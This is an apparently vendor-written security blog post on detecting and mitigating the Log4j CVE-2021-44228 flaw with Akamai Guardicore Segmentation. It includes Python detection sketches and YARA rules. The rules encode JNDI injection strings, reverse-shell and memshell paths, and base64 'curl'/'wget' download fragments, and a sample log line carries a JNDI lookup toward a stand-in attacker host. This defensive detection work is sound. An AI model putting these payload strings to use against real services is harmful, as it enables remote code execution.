Executive summary

A critical remote code-execution vulnerability (CVE-2021-44228) has been publicly disclosed in Log4j, an open-source logging utility that’s used widely in applications, including many utilized by large enterprise organizations.

The vulnerability allows threat actors to exfiltrate information from, and execute malicious code on, systems running applications that use the library by manipulating log messages. There are already reports of servers performing internet-wide scans to locate vulnerable servers, and our threat intelligence teams are seeing attempts to exploit this vulnerability at alarming volumes. Log4j is incorporated into many popular frameworks and many Java applications, making the impact widespread.

Akamai Guardicore Segmentation is well positioned to address this vulnerability in different ways. It’s highly recommended that organizations update Log4j to its latest version, 2.16.0. Due to the rapidly escalating nature of this vulnerability, Akamai teams will continue to develop and deploy mitigation measures in order to support our customers.

As a follow-up to Akamai’s recent post, we want to provide more detail on how organizations can leverage Akamai Guardicore Segmentation features to help address Log4j exposure.

Log4j vulnerability: scope and impact

Log4j is a Java-based open-source logging library. On December 9, 2021, a critical vulnerability involving unauthenticated remote code execution (CVE-2021-44228) in Log4j was reported, causing concern because of how commonly Log4j is used. In addition to being used directly in a large number of applications, Log4j is also incorporated into a host of popular frameworks, including Apache Struts2, Apache Solr, Apache Druid, and Apache Flink.



Although Akamai first observed exploit attempts on the Log4j vulnerability on December 9th, following the widespread publication of the incident, we are now seeing evidence suggesting that exploitation could have been occurring for months. Since widespread publication of the vulnerability, we have seen multiple variants seeking to exploit it, with attack traffic sustained at around 2M exploit requests per hour. The speed at which the variants are evolving is unprecedented.

On a vulnerable machine, a threat actor can remotely supply a set of commands that Log4j executes, giving the attacker the ability to run arbitrary commands on the server. This can allow an attacker to compromise a vulnerable system, including those that might be secured deep inside a network with no direct access to the internet.

Akamai’s security teams have been monitoring attackers attempting to use Log4j in recent days. In addition to the increase in attempted exploitation, Akamai researchers are seeing attackers use a multitude of tools and attack techniques to get vulnerable components to log malicious content in order to achieve remote code execution. This shows how readily threat actors exploit a new vulnerability: the worse the vulnerability is, the quicker they will act.

Mitigating Log4j abuse using Akamai Guardicore Segmentation

Customers using Akamai Guardicore Segmentation can leverage its deep, process-level visibility to identify vulnerable applications and potential security risks in the environment. They can then use it to enact precise control over network traffic in order to stop attempted attacks on vulnerable systems, without disruptions to normal business operations.

Guardicore Hunt customers have their environments monitored and investigated continuously by a dedicated team of security researchers. Alerts on security risks and suggested mitigation steps are immediately sent.

If you’d like to hear more about Akamai Guardicore Segmentation, read more or contact us.

What’s under threat: identify vulnerable Java processes and Log4j abuse



In order to protect against potential Log4j abuse, it is necessary to first identify potentially exploitable processes. This requires deep visibility into network traffic at the process level, which is provided by the Reveal and Insight features of Akamai Guardicore Segmentation. Precise visibility into internet connections and traffic at the process level allows us to see clearly what mitigation steps need to be taken, and visibility tools with historical data are pivotal in helping to prevent disruption to business operations.

Identify internet-connected Java applications: using Reveal Explore Map, create a map for the previous week, and filter by Java applications (such as tomcat, elastic, logstash) and by applications that have connections to or from the internet. Using this map, you can see which assets are under potential threat. While this won’t yet identify Log4j applications, it can give you an idea of which machines to prioritize in your mitigation process.

Create a historical map to analyze normal communication patterns: using Reveal Explore Map, create a historical map of previous weeks (excluding the time since Log4j was reported) to view and learn normal communication patterns. Use this information to identify legitimate communications and respond without disrupting the business. For example, a historical map might indicate which network connections exist under normal circumstances; those could be allowed, while other connections are blocked or alerted on. Additionally, compare and contrast with a more recent map to identify anomalies.
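The comparison between a historical map and a recent one amounts to a set difference over observed connections. The following is a minimal sketch of that idea, assuming the connections have been exported as plain records; the `Flow` type, its field names, and the sample hosts are illustrative assumptions and not a Guardicore export format.

```python
from typing import NamedTuple


class Flow(NamedTuple):
    """One observed connection; the field names are illustrative assumptions."""
    source: str
    destination: str
    port: int
    process: str


def new_flows(baseline, recent):
    """Return flows seen recently that never appeared in the baseline, sorted for stable output."""
    return sorted(set(recent) - set(baseline))


# Hypothetical data: weeks of normal traffic versus the days since disclosure.
baseline = [
    Flow("app-01", "db-01", 5432, "java"),
    Flow("app-01", "cache-01", 6379, "java"),
]
recent = [
    Flow("app-01", "db-01", 5432, "java"),
    Flow("app-01", "203.0.113.7", 1389, "java"),
]

for flow in new_flows(baseline, recent):
    print(flow)
```

Flows present in the baseline are candidates for allow rules, while anything returned by `new_flows` deserves a closer look before it is allowed or blocked.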



Identify applications vulnerable to Log4j abuse: in the query section below, use Query 1 with Insight queries to identify assets that are running Java applications which have Log4j jar files in their directories. This query should return all Log4j packages in your environment, allowing you to assess and address any mitigation steps needed. To better prioritize exposed machines, cross-reference the information with the Reveal Explore Map described previously.

Note that this query identifies Log4j packages that exist in the Java process’s current working directory or its subdirectories.
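The same idea, looking under a directory for Log4j jars and checking their versions, can be sketched outside of Insight. This is not Query 1; it is a minimal local illustration that assumes jars follow the conventional `log4j-core-<major>.<minor>.<patch>.jar` naming and compares them against 2.16.0, the version recommended above. The function names are hypothetical. Renamed, shaded, or pre-release jars do not match the pattern and are skipped, so the result can undercount.

```python
import re
from pathlib import Path

# Assumption: jars keep the conventional log4j-core-X.Y.Z.jar file name.
JAR_NAME = re.compile(r"^log4j-core-(\d+)\.(\d+)\.(\d+)\.jar$")
RECOMMENDED_VERSION = (2, 16, 0)  # version recommended in this article


def parse_log4j_version(filename):
    """Return (major, minor, patch) for a log4j-core jar name, or None if it does not match."""
    match = JAR_NAME.match(filename)
    return tuple(int(part) for part in match.groups()) if match else None


def needs_update(filename):
    """True when the jar is a recognizable log4j-core build older than the recommended version."""
    version = parse_log4j_version(filename)
    return version is not None and version < RECOMMENDED_VERSION


def find_outdated_jars(root):
    """Walk root and its subdirectories, returning paths of outdated log4j-core jars."""
    return sorted(
        path for path in Path(root).rglob("log4j-core-*.jar") if needs_update(path.name)
    )


if __name__ == "__main__":
    # Scan the current working directory, mirroring the scope described above.
    for jar in find_outdated_jars("."):
        print(jar)
```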

Detect potential exploitation attempts in Linux logs: run an Insight query using a YARA signature rule (Query 2, provided below in the query section) to search for known Log4j IoCs in the logs of Linux machines. This can help you identify whether you’ve been attacked.

Note that a negative result does not necessarily mean that no attack exists, as this is only one of many indicators.
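To make the log check concrete, here is a minimal sketch that applies two of the regular expressions from Query 2 (the JNDI lookup pattern and its internal-address exclusion) to individual log lines. It is an illustration and not a replacement for the YARA rules: the function name and sample lines are hypothetical, and the exclusion is applied per line here, whereas the YARA condition evaluates it per scanned file.

```python
import re

# JNDI lookup pattern, adapted to Python syntax from the "Hard" rule in Query 2.
JNDI_LOOKUP = re.compile(
    r"\$\{jndi:(ldap|ldaps|rmi|dns|iiop|http|nis|nds|corba):/[/]?"
    r"[a-z0-9.\-]{3,120}:[0-9]{2,5}/[a-zA-Z.]{1,32}\}"
)

# False-positive filter from the same rule: lookups that target internal addresses.
INTERNAL_TARGET = re.compile(
    r"(ldap|rmi|ldaps|dns):/[/]?(127\.0\.0\.1|192\.168\.|172\.[1-3][0-9]\.|10\.)"
)


def suspicious_lines(lines):
    """Return lines containing a JNDI lookup that does not point at an internal address."""
    return [
        line
        for line in lines
        if JNDI_LOOKUP.search(line) and not INTERNAL_TARGET.search(line)
    ]


# Hypothetical log lines for illustration.
sample = [
    "GET /?q=${jndi:ldap://attacker.example.com:1389/a} HTTP/1.1",
    "GET /?q=${jndi:ldap://192.168.1.20:1389/test} HTTP/1.1",
    "INFO user logged in",
]

for line in suspicious_lines(sample):
    print(line)
```

Obfuscated payloads such as nested `${lower:...}` lookups are not covered by this pattern, which is why Query 2 carries separate rules for them.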

Stopping the attack: using Guardicore Segmentation to block malicious IoCs and attack vectors

It is imperative to be able to take action once vulnerable applications have been identified. While patching is underway, Akamai Guardicore Segmentation offers a multitude of options for alerting on, stopping, and preventing potential attacks. Critically, a solution with detailed and precise control over network communication and traffic is required to surgically block or isolate attack vectors, with minimal to no disruption to normal business functions.

Automatically block IoCs with Threat Intelligence Firewall (TIFW) and DNS Security: Akamai security teams are working around the clock to identify IPs and domains used for Log4j exploitation. Customers who have these features turned on can expect a constantly updated list of IoCs to be blocked, preventing Log4j from being used to download malicious payloads. Note that TIFW can be set to either alert or block, so please ensure it’s configured correctly. DNS Security is available from V41 onwards. The IoCs are also available on the Guardicore Threat Intel Repository and Guardicore Reputation Service.

Fully quarantine compromised servers: if compromised machines are identified during your investigation, use Akamai Guardicore Segmentation to isolate attacked/vulnerable servers from the rest of your network. Leverage built-in templates to easily enable deployment of segmentation policy to mitigate attacks.

Block inbound and outbound traffic to vulnerable assets: as a precautionary measure, you may also choose to block traffic to all machines identified with an unpatched version of Log4j, until patching is completed. Using a historical map of network traffic can help you limit the impact on business operations.

Create block rules for outgoing traffic from Java applications to the internet: if necessary, all internet-connected Java applications revealed in previous steps can be blocked from accessing the internet, as an additional precaution, until patching is complete.

Search queries

Query 1: To identify assets that are running Java applications and that also have a Log4j jar file under their directories, run the following Insight query:

Query 2: To detect potential exploitation attempts, run an Insight query using YARA signature rules (our thanks to Florian Roth who published the original rule):

SELECT path, count FROM yara WHERE path LIKE '/var/log/%%' AND sigrule = "rule EXPL_Log4j_CallBackDomain_IOCs_Dec21_1 {
  strings:
    $xr1 = /\b(ldap|rmi):\/\/([a-z0-9\.]{1,16}\.bingsearchlib\.com|[a-z0-9\.]{1,40}\.interact\.sh|[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}):[0-9]{2,5}\/([aZ]|ua|Exploit|callback|[0-9]{10}|http443useragent|http80useragent)\b/
  condition:
    1 of them
}

rule EXPL_JNDI_Exploit_Patterns_Dec21_1 {
  strings:
    $ = {22 2F 42 61 73 69 63 2F 43 6F 6D 6D 61 6E 64 2F 42 61 73 65 36 34 2F 22}
    $ = {22 2F 42 61 73 69 63 2F 52 65 76 65 72 73 65 53 68 65 6C 6C 2F 22}
    $ = {22 2F 42 61 73 69 63 2F 54 6F 6D 63 61 74 4D 65 6D 73 68 65 6C 6C 22}
    $ = {22 2F 42 61 73 69 63 2F 4A 65 74 74 79 4D 65 6D 73 68 65 6C 6C 22}
    $ = {22 2F 42 61 73 69 63 2F 57 65 62 6C 6F 67 69 63 4D 65 6D 73 68 65 6C 6C 22}
    $ = {22 2F 42 61 73 69 63 2F 4A 42 6F 73 73 4D 65 6D 73 68 65 6C 6C 22}
    $ = {22 2F 42 61 73 69 63 2F 57 65 62 73 70 68 65 72 65 4D 65 6D 73 68 65 6C 6C 22}
    $ = {22 2F 42 61 73 69 63 2F 53 70 72 69 6E 67 4D 65 6D 73 68 65 6C 6C 22}
    $ = {22 2F 44 65 73 65 72 69 61 6C 69 7A 61 74 69 6F 6E 2F 55 52 4C 44 4E 53 2F 22}
    $ = {22 2F 44 65 73 65 72 69 61 6C 69 7A 61 74 69 6F 6E 2F 43 6F 6D 6D 6F 6E 73 43 6F 6C 6C 65 63 74 69 6F 6E 73 31 2F 44 6E 73 6C 6F 67 2F 22}
    $ = {22 2F 44 65 73 65 72 69 61 6C 69 7A 61 74 69 6F 6E 2F 43 6F 6D 6D 6F 6E 73 43 6F 6C 6C 65 63 74 69 6F 6E 73 32 2F 43 6F 6D 6D 61 6E 64 2F 42 61 73 65 36 34 2F 22}
    $ = {22 2F 44 65 73 65 72 69 61 6C 69 7A 61 74 69 6F 6E 2F 43 6F 6D 6D 6F 6E 73 42 65 61 6E 75 74 69 6C 73 31 2F 52 65 76 65 72 73 65 53 68 65 6C 6C 2F 22}
    $ = {22 2F 44 65 73 65 72 69 61 6C 69 7A 61 74 69 6F 6E 2F 4A 72 65 38 75 32 30 2F 54 6F 6D 63 61 74 4D 65 6D 73 68 65 6C 6C 22}
    $ = {22 2F 54 6F 6D 63 61 74 42 79 70 61 73 73 2F 44 6E 73 6C 6F 67 2F 22}
    $ = {22 2F 54 6F 6D 63 61 74 42 79 70 61 73 73 2F 43 6F 6D 6D 61 6E 64 2F 22}
    $ = {22 2F 54 6F 6D 63 61 74 42 79 70 61 73 73 2F 52 65 76 65 72 73 65 53 68 65 6C 6C 2F 22}
    $ = {22 2F 54 6F 6D 63 61 74 42 79 70 61 73 73 2F 54 6F 6D 63 61 74 4D 65 6D 73 68 65 6C 6C 22}
    $ = {22 2F 54 6F 6D 63 61 74 42 79 70 61 73 73 2F 53 70 72 69 6E 67 4D 65 6D 73 68 65 6C 6C 22}
    $ = {22 2F 47 72 6F 6F 76 79 42 79 70 61 73 73 2F 43 6F 6D 6D 61 6E 64 2F 22}
    $ = {22 2F 57 65 62 73 70 68 65 72 65 42 79 70 61 73 73 2F 55 70 6C 6F 61 64 2F 22}
  condition:
    1 of them
}

rule EXPL_Log4j_CVE_2021_44228_JAVA_Exception_Dec21_1 {
  strings:
    $xa1 = {22 68 65 61 64 65 72 20 77 69 74 68 20 76 61 6C 75 65 20 6F 66 20 42 61 64 41 74 74 72 69 62 75 74 65 56 61 6C 75 65 45 78 63 65 70 74 69 6F 6E 3A 20 22}
    $sa1 = {22 2E 6C 6F 67 34 6A 2E 63 6F 72 65 2E 6E 65 74 2E 4A 6E 64 69 4D 61 6E 61 67 65 72 2E 6C 6F 6F 6B 75 70 28 4A 6E 64 69 4D 61 6E 61 67 65 72 22}
    $sa2 = {22 45 72 72 6F 72 20 6C 6F 6F 6B 69 6E 67 20 75 70 20 4A 4E 44 49 20 72 65 73 6F 75 72 63 65 22}
  condition:
    $xa1 or all of ($sa*)
}

rule EXPL_Log4j_CVE_2021_44228_Dec21_Soft {
  strings:
    $ = {22 24 7B 6A 6E 64 69 3A 6C 64 61 70 3A 2F 22}
    $ = {22 24 7B 6A 6E 64 69 3A 72 6D 69 3A 2F 22}
    $ = {22 24 7B 6A 6E 64 69 3A 6C 64 61 70 73 3A 2F 22}
    $ = {22 24 7B 6A 6E 64 69 3A 64 6E 73 3A 2F 22}
    $ = {22 24 7B 6A 6E 64 69 3A 69 69 6F 70 3A 2F 22}
    $ = {22 24 7B 6A 6E 64 69 3A 68 74 74 70 3A 2F 22}
    $ = {22 24 7B 6A 6E 64 69 3A 6E 69 73 3A 2F 22}
    $ = {22 24 7B 6A 6E 64 69 3A 6E 64 73 3A 2F 22}
    $ = {22 24 7B 6A 6E 64 69 3A 63 6F 72 62 61 3A 2F 22}
  condition:
    1 of them
}

rule EXPL_Log4j_CVE_2021_44228_Dec21_OBFUSC {
  strings:
    $x1 = {22 24 25 37 42 6A 6E 64 69 3A 22}
    $x2 = {22 25 32 35 32 34 25 32 35 37 42 6A 6E 64 69 22}
    $x3 = {22 25 32 46 25 32 35 32 35 32 34 25 32 35 32 35 37 42 6A 6E 64 69 25 33 41 22}
    $x4 = {22 24 7B 6A 6E 64 69 3A 24 7B 6C 6F 77 65 72 3A 22}
    $x5 = {22 24 7B 3A 3A 2D 6A 7D 24 7B 22}
  condition:
    1 of them
}

rule EXPL_Log4j_CVE_2021_44228_Dec21_Hard {
  strings:
    $x1 = /\$\{jndi:(ldap|ldaps|rmi|dns|iiop|http|nis|nds|corba):\/[\/]?[a-z-\.0-9]{3,120}:[0-9]{2,5}\/[a-zA-Z\.]{1,32}\}/
    $fp1r = /(ldap|rmi|ldaps|dns):\/[\/]?(127\.0\.0\.1|192\.168\.|172\.[1-3][0-9]\.|10\.)/
  condition:
    $x1 and not 1 of ($fp*)
}

rule SUSP_Base64_Encoded_Exploit_Indicators_Dec21 {
  strings:
    /* curl -s */
    $sa1 = {22 59 33 56 79 62 43 41 74 63 79 22}
    $sa2 = {22 4E 31 63 6D 77 67 4C 58 4D 67 22}
    $sa3 = {22 6A 64 58 4A 73 49 43 31 7A 49 22}
    /* |wget -q -O- */
    $sb1 = {22 66 48 64 6E 5A 58 51 67 4C 58 45 67 4C 55 38 74 49 22}
    $sb2 = {22 78 33 5A 32 56 30 49 43 31 78 49 43 31 50 4C 53 22}
    $sb3 = {22 38 64 32 64 6C 64 43 41 74 63 53 41 74 54 79 30 67 22}
  condition:
    1 of ($sa*) and 1 of ($sb*)
}

rule SUSP_JDNIExploit_Indicators_Dec21 {
  strings:
    $xr1 = /(ldap|ldaps|rmi|dns|iiop|http|nis|nds|corba):\/\/[a-zA-Z0-9\.]{7,80}:[0-9]{2,5}\/(Basic\/Command\/Base64|Basic\/ReverseShell|Basic\/TomcatMemshell|Basic\/JBossMemshell|Basic\/WebsphereMemshell|Basic\/SpringMemshell|Basic\/Command|Deserialization\/CommonsCollectionsK|Deserialization\/CommonsBeanutils|Deserialization\/Jre8u20\/TomcatMemshell|Deserialization\/CVE_2020_2555\/WeblogicMemshell|TomcatBypass|GroovyBypass|WebsphereBypass)\//
  condition:
    filesize < 100MB and $xr1
}

rule SUSP_EXPL_OBFUSC_Dec21_1 {
  strings:
    /* ${lower:X} - single character match */
    $ = { 24 7B 6C 6F 77 65 72 3A ?? 7D }
    /* ${upper:X} - single character match */
    $ = { 24 7B 75 70 70 65 72 3A ?? 7D }
    /* URL encoded lower - obfuscation in URL */
    $ = {22 24 25 37 62 6C 6F 77 65 72 3A 22}
    $ = {22 24 25 37 62 75 70 70 65 72 3A 22}
    $ = {22 25 32 34 25 37 62 6A 6E 64 69 3A 22}
    $ = {22 24 25 37 42 6C 6F 77 65 72 3A 22}
    $ = {22 24 25 37 42 75 70 70 65 72 3A 22}
    $ = {22 25 32 34 25 37 42 6A 6E 64 69 3A 22}
  condition:
    1 of them
}"
AND count > 0 AND path NOT LIKE "/var/log/gc%"
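The hex strings in Query 2 are hard to read at a glance, so the sketch below decodes the three `$sa*` patterns from the Base64 rule and shows why there are three of them. A Base64 fragment changes depending on where the command falls relative to the 3-byte encoding boundary, so one string is needed per alignment. The helper names are hypothetical, and the check assumes the encoded command is `curl -s ` with a trailing space. Most hex strings in the query begin and end with byte 22, the ASCII double quote; the sketch strips those bytes before comparing. Whether the query is meant to match the quotes literally is not stated in the source.

```python
import base64


def decode_hex_pattern(pattern):
    """Turn a space-separated hex string from the rule into readable ASCII text."""
    return bytes.fromhex(pattern).decode("ascii")


# The three $sa* patterns, copied from SUSP_Base64_Encoded_Exploit_Indicators_Dec21.
SA_PATTERNS = [
    "22 59 33 56 79 62 43 41 74 63 79 22",
    "22 4E 31 63 6D 77 67 4C 58 4D 67 22",
    "22 6A 64 58 4A 73 49 43 31 7A 49 22",
]

# Strip the surrounding quote bytes (0x22) to get the bare Base64 fragments.
fragments = [decode_hex_pattern(pattern).strip('"') for pattern in SA_PATTERNS]


def encoded_at_offset(command, offset):
    """Base64-encode the command preceded by `offset` filler bytes to shift its alignment."""
    return base64.b64encode(b"A" * offset + command).decode("ascii")


for offset, fragment in enumerate(fragments):
    encoded = encoded_at_offset(b"curl -s ", offset)
    print(offset, fragment, fragment in encoded)
```

Each fragment appears in the encoding at its own offset regardless of the filler bytes, because it only covers the Base64 characters that are fully determined by the command itself.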

Source: https://www.akamai.com/blog/security/recommendations-for-log4j-mitigation
